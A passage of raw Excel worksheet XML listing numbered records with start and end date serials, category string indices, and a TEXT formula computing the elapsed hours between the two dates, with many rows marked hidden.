        <v>43146.832303240742</v>
      </c>
      <c r="F2145" s="1">
        <v>43153.407280092593</v>
      </c>
      <c r="G2145" t="s">
        <v>37</v>
      </c>
      <c r="H2145" t="str">
        <f>TEXT(F2145-E2145,"[h]")</f>
        <v>157</v>
      </c>
    </row>
    <row r="2146" spans="1:8" hidden="1">
      <c r="A2146" t="s">
        <v>639</v>
      </c>
      <c r="B2146">
        <v>10598</v>
      </c>
      <c r="C2146" t="s">
        <v>640</v>
      </c>
      <c r="D2146" t="s">
        <v>7</v>
      </c>
      <c r="E2146" s="1">
        <v>43146.828657407408</v>
      </c>
      <c r="F2146" s="1">
        <v>43153.407268518517</v>
      </c>
      <c r="G2146" t="s">
        <v>461</v>
      </c>
      <c r="H2146" t="str">
        <f>TEXT(F2146-E2146,"[h]")</f>
        <v>157</v>
      </c>
    </row>
    <row r="2147" spans="1:8" hidden="1">
      <c r="A2147" t="s">
        <v>623</v>
      </c>
      <c r="B2147">
        <v>10596</v>
      </c>
      <c r="C2147" t="s">
        <v>624</v>
      </c>
      <c r="D2147" t="s">
        <v>7</v>
      </c>
      <c r="E2147" s="1">
        <v>43146.723564814813</v>
      </c>
      <c r="F2147" s="1">
        <v>43147.09375</v>
      </c>
      <c r="G2147" t="s">
        <v>445</v>
      </c>
      <c r="H2147" t="str">
        <f>TEXT(F2147-E2147,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="2148" spans="1:8">
      <c r="A2148" t="s">
        <v>641</v>
      </c>
      <c r="B2148">
        <v>10595</v>
      </c>
      <c r="C2148" t="s">
        <v>642</v>
      </c>
      <c r="D2148" t="s">
        <v>7</v>
      </c>
      <c r="E2148" s="1">
        <v>43146.667488425926</v>
      </c>
      <c r="F2148" s="1">
        <v>43147.162395833337</v>
      </c>
      <c r="G2148" t="s">
        <v>112</v>
      </c>
      <c r="H2148" t="str">
        <f>TEXT(F2148-E2148,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="2149" spans="1:8" hidden="1">
      <c r="A2149" t="s">
        <v>643</v>
      </c>
      <c r="B2149">
        <v>10594</v>
      </c>
      <c r="C2149" t="s">
        <v>644</v>
      </c>
      <c r="D2149" t="s">
        <v>7</v>
      </c>
      <c r="E2149" s="1">
        <v>43146.453611111108</v>
      </c>
      <c r="F2149" s="1">
        <v>43147.205636574072</v>
      </c>
      <c r="G2149" t="s">
        <v>645</v>
      </c>
      <c r="H2149" t="str">
        <f>TEXT(F2149-E2149,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="2150" spans="1:8" hidden="1">
      <c r="A2150" t="s">
        <v>646</v>
      </c>
      <c r="B2150">
        <v>10592</v>
      </c>
      <c r="C2150" t="s">
        <v>647</v>
      </c>
      <c r="D2150" t="s">
        <v>7</v>
      </c>
      <c r="E2150" s="1">
        <v>43146.249155092592</v>
      </c>
      <c r="F2150" s="1">
        <v>43146.52375</v>
      </c>
      <c r="G2150" t="s">
        <v>90</v>
      </c>
      <c r="H2150" t="str">
        <f>TEXT(F2150-E2150,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="2151" spans="1:8" hidden="1">
      <c r="A2151" t="s">
        <v>648</v>
      </c>
      <c r="B2151">
        <v>10591</v>
      </c>
      <c r="C2151" t="s">
        <v>649</v>
      </c>
      <c r="D2151" t="s">
        <v>7</v>
      </c>
      <c r="E2151" s="1">
        <v>43146.247731481482</v>
      </c>
      <c r="F2151" s="1">
        <v>43175.152673611112</v>
      </c>
      <c r="G2151" t="s">
        <v>258</v>
      </c>
      <c r="H2151" t="str">
        <f>TEXT(F2151-E2151,"[h]")</f>
        <v>693</v>
      </c>
    </row>
    <row r="2152" spans="1:8">
      <c r="B2152">
        <v>10589</v>
      </c>
      <c r="C2152" t="s">
        <v>650</v>
      </c>
      <c r="D2152" t="s">
        <v>7</v>
      </c>
      <c r="E2152" s="1">
        <v>43145.993993055556</v>
      </c>
      <c r="F2152" s="1">
        <v>43146.3281712963</v>
      </c>
      <c r="G2152" t="s">
        <v>160</v>
      </c>
      <c r="H2152" t="str">
        <f>TEXT(F2152-E2152,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="2153" spans="1:8">
      <c r="A2153" t="s">
        <v>621</v>
      </c>
      <c r="B2153">
        <v>10588</v>
      </c>
      <c r="C2153" t="s">
        <v>622</v>
      </c>
      <c r="D2153" t="s">
        <v>7</v>
      </c>
      <c r="E2153" s="1">
        <v>43145.831921296296</v>
      </c>
      <c r="F2153" s="1">
        <v>43146.00640046296</v>
      </c>
      <c r="G2153" t="s">
        <v>31</v>
      </c>
      <c r="H2153" t="str">
        <f>TEXT(F2153-E2153,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2154" spans="1:8" hidden="1">
      <c r="A2154" t="s">
        <v>651</v>
      </c>
      <c r="B2154">
        <v>10587</v>
      </c>
      <c r="C2154" t="s">
        <v>652</v>
      </c>
      <c r="D2154" t="s">
        <v>7</v>
      </c>
      <c r="E2154" s="1">
        <v>43145.8</v>
      </c>
      <c r="F2154" s="1">
        <v>43618.285613425927</v>
      </c>
      <c r="G2154" t="s">
        <v>204</v>
      </c>
      <c r="H2154" t="str">
        <f>TEXT(F2154-E2154,"[h]")</f>
        <v>11339</v>
      </c>
    </row>
    <row r="2155" spans="1:8" hidden="1">
      <c r="A2155" t="s">
        <v>653</v>
      </c>
      <c r="B2155">
        <v>10586</v>
      </c>
      <c r="C2155" t="s">
        <v>654</v>
      </c>
      <c r="D2155" t="s">
        <v>7</v>
      </c>
      <c r="E2155" s="1">
        <v>43145.776643518519</v>
      </c>
      <c r="F2155" s="1">
        <v>43390.22446759259</v>
      </c>
      <c r="G2155" t="s">
        <v>412</v>
      </c>
      <c r="H2155" t="str">
        <f>TEXT(F2155-E2155,"[h]")</f>
        <v>5866</v>
      </c>
    </row>
    <row r="2156" spans="1:8" hidden="1">
      <c r="A2156" t="s">
        <v>655</v>
      </c>
      <c r="B2156">
        <v>10585</v>
      </c>
      <c r="C2156" t="s">
        <v>656</v>
      </c>
      <c r="D2156" t="s">
        <v>7</v>
      </c>
      <c r="E2156" s="1">
        <v>43145.644953703704</v>
      </c>
      <c r="F2156" s="1">
        <v>43725.526875000003</v>
      </c>
      <c r="G2156" t="s">
        <v>657</v>
      </c>
      <c r="H2156" t="str">
        <f>TEXT(F2156-E2156,"[h]")</f>
        <v>13917</v>
      </c>
    </row>
    <row r="2157" spans="1:8" hidden="1">
      <c r="A2157" t="s">
        <v>658</v>
      </c>
      <c r="B2157">
        <v>10584</v>
      </c>
      <c r="C2157" t="s">
        <v>659</v>
      </c>
      <c r="D2157" t="s">
        <v>7</v>
      </c>
      <c r="E2157" s="1">
        <v>43145.497743055559</v>
      </c>
      <c r="F2157" s="1">
        <v>43297.166701388887</v>
      </c>
      <c r="G2157" t="s">
        <v>660</v>
      </c>
      <c r="H2157" t="str">
        <f>TEXT(F2157-E2157,"[h]")</f>
        <v>3640</v>
      </c>
    </row>
    <row r="2158" spans="1:8" hidden="1">
      <c r="A2158" t="s">
        <v>661</v>
      </c>
      <c r="B2158">
        <v>10583</v>
      </c>
      <c r="C2158" t="s">
        <v>662</v>
      </c>
      <c r="D2158" t="s">
        <v>7</v>
      </c>
      <c r="E2158" s="1">
        <v>43145.174479166664</v>
      </c>
      <c r="F2158" s="1">
        <v>43145.811122685183</v>
      </c>
      <c r="G2158" t="s">
        <v>445</v>
      </c>
      <c r="H2158" t="str">
        <f>TEXT(F2158-E2158,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="2159" spans="1:8" hidden="1">
      <c r="A2159" t="s">
        <v>663</v>
      </c>
      <c r="B2159">
        <v>10578</v>
      </c>
      <c r="C2159" t="s">
        <v>664</v>
      </c>
      <c r="D2159" t="s">
        <v>7</v>
      </c>
      <c r="E2159" s="1">
        <v>43144.222534722219</v>
      </c>
      <c r="F2159" s="1">
        <v>43614.447476851848</v>
      </c>
      <c r="G2159" t="s">
        <v>222</v>
      </c>
      <c r="H2159" t="str">
        <f>TEXT(F2159-E2159,"[h]")</f>
        <v>11285</v>
      </c>
    </row>
    <row r="2160" spans="1:8" hidden="1">
      <c r="A2160" t="s">
        <v>310</v>
      </c>
      <c r="B2160">
        <v>10576</v>
      </c>
      <c r="C2160" t="s">
        <v>665</v>
      </c>
      <c r="D2160" t="s">
        <v>7</v>
      </c>
      <c r="E2160" s="1">
        <v>43143.99423611111</v>
      </c>
      <c r="F2160" s="1">
        <v>43143.998344907406</v>
      </c>
      <c r="G2160" t="s">
        <v>90</v>
      </c>
      <c r="H2160" t="str">
        <f>TEXT(F2160-E2160,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2161" spans="1:8">
      <c r="A2161" t="s">
        <v>666</v>
      </c>
      <c r="B2161">
        <v>10575</v>
      </c>
      <c r="C2161" t="s">
        <v>667</v>
      </c>
      <c r="D2161" t="s">
        <v>7</v>
      </c>
      <c r="E2161" s="1">
        <v>43143.916400462964</v>
      </c>
      <c r="F2161" s="1">
        <v>43338.863113425927</v>
      </c>
      <c r="G2161" t="s">
        <v>25</v>
      </c>
      <c r="H2161" t="str">
        <f>TEXT(F2161-E2161,"[h]")</f>
        <v>4678</v>
      </c>
    </row>
    <row r="2162" spans="1:8" hidden="1">
      <c r="A2162" t="s">
        <v>668</v>
      </c>
      <c r="B2162">
        <v>10572</v>
      </c>
      <c r="C2162" t="s">
        <v>669</v>
      </c>
      <c r="D2162" t="s">
        <v>7</v>
      </c>
      <c r="E2162" s="1">
        <v>43143.423321759263</v>
      </c>
      <c r="F2162" s="1">
        <v>43146.524548611109</v>
      </c>
      <c r="G2162" t="s">
        <v>670</v>
      </c>
      <c r="H2162" t="str">
        <f>TEXT(F2162-E2162,"[h]")</f>
        <v>74</v>
      </c>
    </row>
    <row r="2163" spans="1:8">
      <c r="A2163" t="s">
        <v>671</v>
      </c>
      <c r="B2163">
        <v>10571</v>
      </c>
      <c r="C2163" t="s">
        <v>672</v>
      </c>
      <c r="D2163" t="s">
        <v>7</v>
      </c>
      <c r="E2163" s="1">
        <v>43143.046157407407</v>
      </c>
      <c r="F2163" s="1">
        <v>43144.768622685187</v>
      </c>
      <c r="G2163" t="s">
        <v>72</v>
      </c>
      <c r="H2163" t="str">
        <f>TEXT(F2163-E2163,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="2164" spans="1:8">
      <c r="A2164" t="s">
        <v>673</v>
      </c>
      <c r="B2164">
        <v>10569</v>
      </c>
      <c r="C2164" t="s">
        <v>674</v>
      </c>
      <c r="D2164" t="s">
        <v>7</v>
      </c>
      <c r="E2164" s="1">
        <v>43141.95584490741</v>
      </c>
      <c r="F2164" s="1">
        <v>43518.316111111111</v>
      </c>
      <c r="G2164" t="s">
        <v>126</v>
      </c>
      <c r="H2164" t="str">
        <f>TEXT(F2164-E2164,"[h]")</f>
        <v>9032</v>
      </c>
    </row>
    <row r="2165" spans="1:8" hidden="1">
      <c r="A2165" t="s">
        <v>675</v>
      </c>
      <c r="B2165">
        <v>10568</v>
      </c>
      <c r="C2165" t="s">
        <v>676</v>
      </c>
      <c r="D2165" t="s">
        <v>7</v>
      </c>
      <c r="E2165" s="1">
        <v>43141.705648148149</v>
      </c>
      <c r="F2165" s="1">
        <v>43147.102696759262</v>
      </c>
      <c r="G2165" t="s">
        <v>75</v>
      </c>
      <c r="H2165" t="str">
        <f>TEXT(F2165-E2165,"[h]")</f>
        <v>129</v>
      </c>
    </row>
    <row r="2166" spans="1:8">
      <c r="A2166" t="s">
        <v>677</v>
      </c>
      <c r="B2166">
        <v>10566</v>
      </c>
      <c r="C2166" t="s">
        <v>678</v>
      </c>
      <c r="D2166" t="s">
        <v>7</v>
      </c>
      <c r="E2166" s="1">
        <v>43141.278113425928</v>
      </c>
      <c r="F2166" s="1">
        <v>43141.631377314814</v>
      </c>
      <c r="G2166" t="s">
        <v>16</v>
      </c>
      <c r="H2166" t="str">
        <f>TEXT(F2166-E2166,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="2167" spans="1:8">
      <c r="A2167" t="s">
        <v>679</v>
      </c>
      <c r="B2167">
        <v>10564</v>
      </c>
      <c r="C2167" t="s">
        <v>680</v>
      </c>
      <c r="D2167" t="s">
        <v>7</v>
      </c>
      <c r="E2167" s="1">
        <v>43140.928287037037</v>
      </c>
      <c r="F2167" s="1">
        <v>43184.228715277779</v>
      </c>
      <c r="G2167" t="s">
        <v>16</v>
      </c>
      <c r="H2167" t="str">
        <f>TEXT(F2167-E2167,"[h]")</f>
        <v>1039</v>
      </c>
    </row>
    <row r="2168" spans="1:8">
      <c r="A2168" t="s">
        <v>681</v>
      </c>
      <c r="B2168">
        <v>10563</v>
      </c>
      <c r="C2168" t="s">
        <v>682</v>
      </c>
      <c r="D2168" t="s">
        <v>7</v>
      </c>
      <c r="E2168" s="1">
        <v>43140.728842592594</v>
      </c>
      <c r="F2168" s="1">
        <v>43140.856793981482</v>
      </c>
      <c r="G2168" t="s">
        <v>683</v>
      </c>
      <c r="H2168" t="str">
        <f>TEXT(F2168-E2168,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2169" spans="1:8">
      <c r="A2169" t="s">
        <v>684</v>
      </c>
      <c r="B2169">
        <v>10562</v>
      </c>
      <c r="C2169" t="s">
        <v>685</v>
      </c>
      <c r="D2169" t="s">
        <v>7</v>
      </c>
      <c r="E2169" s="1">
        <v>43140.72378472222</v>
      </c>
      <c r="F2169" s="1">
        <v>43140.902442129627</v>
      </c>
      <c r="G2169" t="s">
        <v>98</v>
      </c>
      <c r="H2169" t="str">
        <f>TEXT(F2169-E2169,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2170" spans="1:8">
      <c r="A2170" t="s">
        <v>686</v>
      </c>
      <c r="B2170">
        <v>10561</v>
      </c>
      <c r="C2170" t="s">
        <v>687</v>
      </c>
      <c r="D2170" t="s">
        <v>7</v>
      </c>
      <c r="E2170" s="1">
        <v>43140.720451388886</v>
      </c>
      <c r="F2170" s="1">
        <v>43140.774143518516</v>
      </c>
      <c r="G2170" t="s">
        <v>98</v>
      </c>
      <c r="H2170" t="str">
        <f>TEXT(F2170-E2170,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2171" spans="1:8">
      <c r="A2171" t="s">
        <v>688</v>
      </c>
      <c r="B2171">
        <v>10560</v>
      </c>
      <c r="C2171" t="s">
        <v>689</v>
      </c>
      <c r="D2171" t="s">
        <v>7</v>
      </c>
      <c r="E2171" s="1">
        <v>43140.696134259262</v>
      </c>
      <c r="F2171" s="1">
        <v>43140.775462962964</v>
      </c>
      <c r="G2171" t="s">
        <v>690</v>
      </c>
      <c r="H2171" t="str">
        <f>TEXT(F2171-E2171,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2172" spans="1:8">
      <c r="A2172" t="s">
        <v>691</v>
      </c>
      <c r="B2172">
        <v>10559</v>
      </c>
      <c r="C2172" t="s">
        <v>692</v>
      </c>
      <c r="D2172" t="s">
        <v>7</v>
      </c>
      <c r="E2172" s="1">
        <v>43140.695023148146</v>
      </c>
      <c r="F2172" s="1">
        <v>43140.775196759256</v>
      </c>
      <c r="G2172" t="s">
        <v>98</v>
      </c>
      <c r="H2172" t="str">
        <f>TEXT(F2172-E2172,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2173" spans="1:8">
      <c r="B2173">
        <v>10555</v>
      </c>
      <c r="C2173" t="s">
        <v>698</v>
      </c>
      <c r="D2173" t="s">
        <v>7</v>
      </c>
      <c r="E2173" s="1">
        <v>43140.379351851851</v>
      </c>
      <c r="F2173" s="1">
        <v>43140.971377314818</v>
      </c>
      <c r="G2173" t="s">
        <v>25</v>
      </c>
      <c r="H2173" t="str">
        <f>TEXT(F2173-E2173,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="2174" spans="1:8" hidden="1">
      <c r="A2174" t="s">
        <v>699</v>
      </c>
      <c r="B2174">
        <v>10554</v>
      </c>
      <c r="C2174" t="s">
        <v>700</v>
      </c>
      <c r="D2174" t="s">
        <v>7</v>
      </c>
      <c r="E2174" s="1">
        <v>43140.287442129629</v>
      </c>
      <c r="F2174" s="1">
        <v>43148.195428240739</v>
      </c>
      <c r="G2174" t="s">
        <v>255</v>
      </c>
      <c r="H2174" t="str">
        <f>TEXT(F2174-E2174,"[h]")</f>
        <v>189</v>
      </c>
    </row>
    <row r="2175" spans="1:8" hidden="1">
      <c r="A2175" t="s">
        <v>701</v>
      </c>
      <c r="B2175">
        <v>10553</v>
      </c>
      <c r="C2175" t="s">
        <v>702</v>
      </c>
      <c r="D2175" t="s">
        <v>7</v>
      </c>
      <c r="E2175" s="1">
        <v>43140.281875000001</v>
      </c>
      <c r="F2175" s="1">
        <v>43142.853009259263</v>
      </c>
      <c r="G2175" t="s">
        <v>28</v>
      </c>
      <c r="H2175" t="str">
        <f>TEXT(F2175-E2175,"[h]")</f>
        <v>61</v>
      </c>
    </row>
    <row r="2176" spans="1:8">
      <c r="A2176" t="s">
        <v>703</v>
      </c>
      <c r="B2176">
        <v>10551</v>
      </c>
      <c r="C2176" t="s">
        <v>704</v>
      </c>
      <c r="D2176" t="s">
        <v>7</v>
      </c>
      <c r="E2176" s="1">
        <v>43140.231273148151</v>
      </c>
      <c r="F2176" s="1">
        <v>43367.837337962963</v>
      </c>
      <c r="G2176" t="s">
        <v>557</v>
      </c>
      <c r="H2176" t="str">
        <f>TEXT(F2176-E2176,"[h]")</f>
        <v>5462</v>
      </c>
    </row>
    <row r="2177" spans="1:8" hidden="1">
      <c r="A2177" t="s">
        <v>707</v>
      </c>
      <c r="B2177">
        <v>10549</v>
      </c>
      <c r="C2177" t="s">
        <v>708</v>
      </c>
      <c r="D2177" t="s">
        <v>7</v>
      </c>
      <c r="E2177" s="1">
        <v>43140.199803240743</v>
      </c>
      <c r="F2177" s="1">
        <v>43249.787708333337</v>
      </c>
      <c r="G2177" t="s">
        <v>258</v>
      </c>
      <c r="H2177" t="str">
        <f>TEXT(F2177-E2177,"[h]")</f>
        <v>2630</v>
      </c>
    </row>
    <row r="2178" spans="1:8">
      <c r="A2178" t="s">
        <v>705</v>
      </c>
      <c r="B2178">
        <v>10548</v>
      </c>
      <c r="C2178" t="s">
        <v>706</v>
      </c>
      <c r="D2178" t="s">
        <v>7</v>
      </c>
      <c r="E2178" s="1">
        <v>43140.17119212963</v>
      </c>
      <c r="F2178" s="1">
        <v>43140.196550925924</v>
      </c>
      <c r="G2178" t="s">
        <v>16</v>
      </c>
      <c r="H2178" t="str">
        <f>TEXT(F2178-E2178,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2179" spans="1:8" hidden="1">
      <c r="A2179" t="s">
        <v>709</v>
      </c>
      <c r="B2179">
        <v>10547</v>
      </c>
      <c r="C2179" t="s">
        <v>710</v>
      </c>
      <c r="D2179" t="s">
        <v>7</v>
      </c>
      <c r="E2179" s="1">
        <v>43139.877893518518</v>
      </c>
      <c r="F2179" s="1">
        <v>43160.088321759256</v>
      </c>
      <c r="G2179" t="s">
        <v>75</v>
      </c>
      <c r="H2179" t="str">
        <f>TEXT(F2179-E2179,"[h]")</f>
        <v>485</v>
      </c>
    </row>
    <row r="2180" spans="1:8">
      <c r="A2180" t="s">
        <v>695</v>
      </c>
      <c r="B2180">
        <v>10546</v>
      </c>
      <c r="C2180" t="s">
        <v>696</v>
      </c>
      <c r="D2180" t="s">
        <v>7</v>
      </c>
      <c r="E2180" s="1">
        <v>43139.706307870372</v>
      </c>
      <c r="F2180" s="1">
        <v>43139.979872685188</v>
      </c>
      <c r="G2180" t="s">
        <v>697</v>
      </c>
      <c r="H2180" t="str">
        <f>TEXT(F2180-E2180,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="2181" spans="1:8">
      <c r="A2181" t="s">
        <v>619</v>
      </c>
      <c r="B2181">
        <v>10544</v>
      </c>
      <c r="C2181" t="s">
        <v>620</v>
      </c>
      <c r="D2181" t="s">
        <v>7</v>
      </c>
      <c r="E2181" s="1">
        <v>43139.212430555555</v>
      </c>
      <c r="F2181" s="1">
        <v>43143.210833333331</v>
      </c>
      <c r="G2181" t="s">
        <v>16</v>
      </c>
      <c r="H2181" t="str">
        <f>TEXT(F2181-E2181,"[h]")</f>
        <v>95</v>
      </c>
    </row>
    <row r="2182" spans="1:8" hidden="1">
      <c r="A2182" t="s">
        <v>693</v>
      </c>
      <c r="B2182">
        <v>10543</v>
      </c>
      <c r="C2182" t="s">
        <v>694</v>
      </c>
      <c r="D2182" t="s">
        <v>7</v>
      </c>
      <c r="E2182" s="1">
        <v>43139.005069444444</v>
      </c>
      <c r="F2182" s="1">
        <v>43140.114907407406</v>
      </c>
      <c r="G2182" t="s">
        <v>536</v>
      </c>
      <c r="H2182" t="str">
        <f>TEXT(F2182-E2182,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="2183" spans="1:8">
      <c r="A2183" t="s">
        <v>711</v>
      </c>
      <c r="B2183">
        <v>10542</v>
      </c>
      <c r="C2183" t="s">
        <v>712</v>
      </c>
      <c r="D2183" t="s">
        <v>7</v>
      </c>
      <c r="E2183" s="1">
        <v>43138.765486111108</v>
      </c>
      <c r="F2183" s="1">
        <v>43138.807847222219</v>
      </c>
      <c r="G2183" t="s">
        <v>713</v>
      </c>
      <c r="H2183" t="str">
        <f>TEXT(F2183-E2183,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2184" spans="1:8" hidden="1">
      <c r="A2184" t="s">
        <v>714</v>
      </c>
      <c r="B2184">
        <v>10541</v>
      </c>
      <c r="C2184" t="s">
        <v>715</v>
      </c>
      <c r="D2184" t="s">
        <v>7</v>
      </c>
      <c r="E2184" s="1">
        <v>43138.731087962966</v>
      </c>
      <c r="F2184" s="1">
        <v>43138.784432870372</v>
      </c>
      <c r="G2184" t="s">
        <v>716</v>
      </c>
      <c r="H2184" t="str">
        <f>TEXT(F2184-E2184,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2185" spans="1:8">
      <c r="A2185" t="s">
        <v>717</v>
      </c>
      <c r="B2185">
        <v>10540</v>
      </c>
      <c r="C2185" t="s">
        <v>718</v>
      </c>
      <c r="D2185" t="s">
        <v>7</v>
      </c>
      <c r="E2185" s="1">
        <v>43138.722974537035</v>
      </c>
      <c r="F2185" s="1">
        <v>43138.775625000002</v>
      </c>
      <c r="G2185" t="s">
        <v>98</v>
      </c>
      <c r="H2185" t="str">
        <f>TEXT(F2185-E2185,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2186" spans="1:8">
      <c r="A2186" t="s">
        <v>721</v>
      </c>
      <c r="B2186">
        <v>10537</v>
      </c>
      <c r="C2186" t="s">
        <v>722</v>
      </c>
      <c r="D2186" t="s">
        <v>7</v>
      </c>
      <c r="E2186" s="1">
        <v>43138.277314814812</v>
      </c>
      <c r="F2186" s="1">
        <v>43138.908483796295</v>
      </c>
      <c r="G2186" t="s">
        <v>13</v>
      </c>
      <c r="H2186" t="str">
        <f>TEXT(F2186-E2186,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="2187" spans="1:8">
      <c r="A2187" t="s">
        <v>723</v>
      </c>
      <c r="B2187">
        <v>10536</v>
      </c>
      <c r="C2187" t="s">
        <v>724</v>
      </c>
      <c r="D2187" t="s">
        <v>7</v>
      </c>
      <c r="E2187" s="1">
        <v>43138.06622685185</v>
      </c>
      <c r="F2187" s="1">
        <v>43138.111643518518</v>
      </c>
      <c r="G2187" t="s">
        <v>725</v>
      </c>
      <c r="H2187" t="str">
        <f>TEXT(F2187-E2187,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2188" spans="1:8">
      <c r="A2188" t="s">
        <v>728</v>
      </c>
      <c r="B2188">
        <v>10533</v>
      </c>
      <c r="C2188" t="s">
        <v>729</v>
      </c>
      <c r="D2188" t="s">
        <v>7</v>
      </c>
      <c r="E2188" s="1">
        <v>43137.775416666664</v>
      </c>
      <c r="F2188" s="1">
        <v>43419.580393518518</v>
      </c>
      <c r="G2188" t="s">
        <v>16</v>
      </c>
      <c r="H2188" t="str">
        <f>TEXT(F2188-E2188,"[h]")</f>
        <v>6763</v>
      </c>
    </row>
    <row r="2189" spans="1:8">
      <c r="A2189" t="s">
        <v>730</v>
      </c>
      <c r="B2189">
        <v>10532</v>
      </c>
      <c r="C2189" t="s">
        <v>731</v>
      </c>
      <c r="D2189" t="s">
        <v>7</v>
      </c>
      <c r="E2189" s="1">
        <v>43137.752476851849</v>
      </c>
      <c r="F2189" s="1">
        <v>43417.60359953704</v>
      </c>
      <c r="G2189" t="s">
        <v>732</v>
      </c>
      <c r="H2189" t="str">
        <f>TEXT(F2189-E2189,"[h]")</f>
        <v>6716</v>
      </c>
    </row>
    <row r="2190" spans="1:8">
      <c r="A2190" t="s">
        <v>726</v>
      </c>
      <c r="B2190">
        <v>10529</v>
      </c>
      <c r="C2190" t="s">
        <v>727</v>
      </c>
      <c r="D2190" t="s">
        <v>7</v>
      </c>
      <c r="E2190" s="1">
        <v>43137.391250000001</v>
      </c>
      <c r="F2190" s="1">
        <v>43137.892372685186</v>
      </c>
      <c r="G2190" t="s">
        <v>25</v>
      </c>
      <c r="H2190" t="str">
        <f>TEXT(F2190-E2190,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="2191" spans="1:8">
      <c r="A2191" t="s">
        <v>733</v>
      </c>
      <c r="B2191">
        <v>10528</v>
      </c>
      <c r="C2191" t="s">
        <v>734</v>
      </c>
      <c r="D2191" t="s">
        <v>7</v>
      </c>
      <c r="E2191" s="1">
        <v>43137.086759259262</v>
      </c>
      <c r="F2191" s="1">
        <v>43259.813819444447</v>
      </c>
      <c r="G2191" t="s">
        <v>16</v>
      </c>
      <c r="H2191" t="str">
        <f>TEXT(F2191-E2191,"[h]")</f>
        <v>2945</v>
      </c>
    </row>
    <row r="2192" spans="1:8" hidden="1">
      <c r="A2192" t="s">
        <v>735</v>
      </c>
      <c r="B2192">
        <v>10525</v>
      </c>
      <c r="C2192" t="s">
        <v>736</v>
      </c>
      <c r="D2192" t="s">
        <v>7</v>
      </c>
      <c r="E2192" s="1">
        <v>43136.233460648145</v>
      </c>
      <c r="F2192" s="1">
        <v>43313.624247685184</v>
      </c>
      <c r="G2192" t="s">
        <v>737</v>
      </c>
      <c r="H2192" t="str">
        <f>TEXT(F2192-E2192,"[h]")</f>
        <v>4257</v>
      </c>
    </row>
    <row r="2193" spans="1:8">
      <c r="A2193" t="s">
        <v>719</v>
      </c>
      <c r="B2193">
        <v>10524</v>
      </c>
      <c r="C2193" t="s">
        <v>720</v>
      </c>
      <c r="D2193" t="s">
        <v>7</v>
      </c>
      <c r="E2193" s="1">
        <v>43136.227592592593</v>
      </c>
      <c r="F2193" s="1">
        <v>43136.69672453704</v>
      </c>
      <c r="G2193" t="s">
        <v>31</v>
      </c>
      <c r="H2193" t="str">
        <f>TEXT(F2193-E2193,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="2194" spans="1:8">
      <c r="A2194" t="s">
        <v>738</v>
      </c>
      <c r="B2194">
        <v>10523</v>
      </c>
      <c r="C2194" t="s">
        <v>739</v>
      </c>
      <c r="D2194" t="s">
        <v>7</v>
      </c>
      <c r="E2194" s="1">
        <v>43136.058680555558</v>
      </c>
      <c r="F2194" s="1">
        <v>43136.233865740738</v>
      </c>
      <c r="G2194" t="s">
        <v>31</v>
      </c>
      <c r="H2194" t="str">
        <f>TEXT(F2194-E2194,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2195" spans="1:8" hidden="1">
      <c r="A2195" t="s">
        <v>740</v>
      </c>
      <c r="B2195">
        <v>10522</v>
      </c>
      <c r="C2195" t="s">
        <v>741</v>
      </c>
      <c r="D2195" t="s">
        <v>7</v>
      </c>
      <c r="E2195" s="1">
        <v>43135.980520833335</v>
      </c>
      <c r="F2195" s="1">
        <v>43136.058587962965</v>
      </c>
      <c r="G2195" t="s">
        <v>28</v>
      </c>
      <c r="H2195" t="str">
        <f>TEXT(F2195-E2195,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2196" spans="1:8" hidden="1">
      <c r="A2196" t="s">
        <v>742</v>
      </c>
      <c r="B2196">
        <v>10518</v>
      </c>
      <c r="C2196" t="s">
        <v>743</v>
      </c>
      <c r="D2196" t="s">
        <v>7</v>
      </c>
      <c r="E2196" s="1">
        <v>43134.837233796294</v>
      </c>
      <c r="F2196" s="1">
        <v>43135.708379629628</v>
      </c>
      <c r="G2196" t="s">
        <v>461</v>
      </c>
      <c r="H2196" t="str">
        <f>TEXT(F2196-E2196,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="2197" spans="1:8" hidden="1">
      <c r="A2197" t="s">
        <v>744</v>
      </c>
      <c r="B2197">
        <v>10516</v>
      </c>
      <c r="C2197" t="s">
        <v>745</v>
      </c>
      <c r="D2197" t="s">
        <v>7</v>
      </c>
      <c r="E2197" s="1">
        <v>43134.798819444448</v>
      </c>
      <c r="F2197" s="1">
        <v>43135.089409722219</v>
      </c>
      <c r="G2197" t="s">
        <v>28</v>
      </c>
      <c r="H2197" t="str">
        <f>TEXT(F2197-E2197,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="2198" spans="1:8" hidden="1">
      <c r="A2198" t="s">
        <v>746</v>
      </c>
      <c r="B2198">
        <v>10512</v>
      </c>
      <c r="C2198" t="s">
        <v>747</v>
      </c>
      <c r="D2198" t="s">
        <v>7</v>
      </c>
      <c r="E2198" s="1">
        <v>43133.55978009259</v>
      </c>
      <c r="F2198" s="1">
        <v>43481.354375000003</v>
      </c>
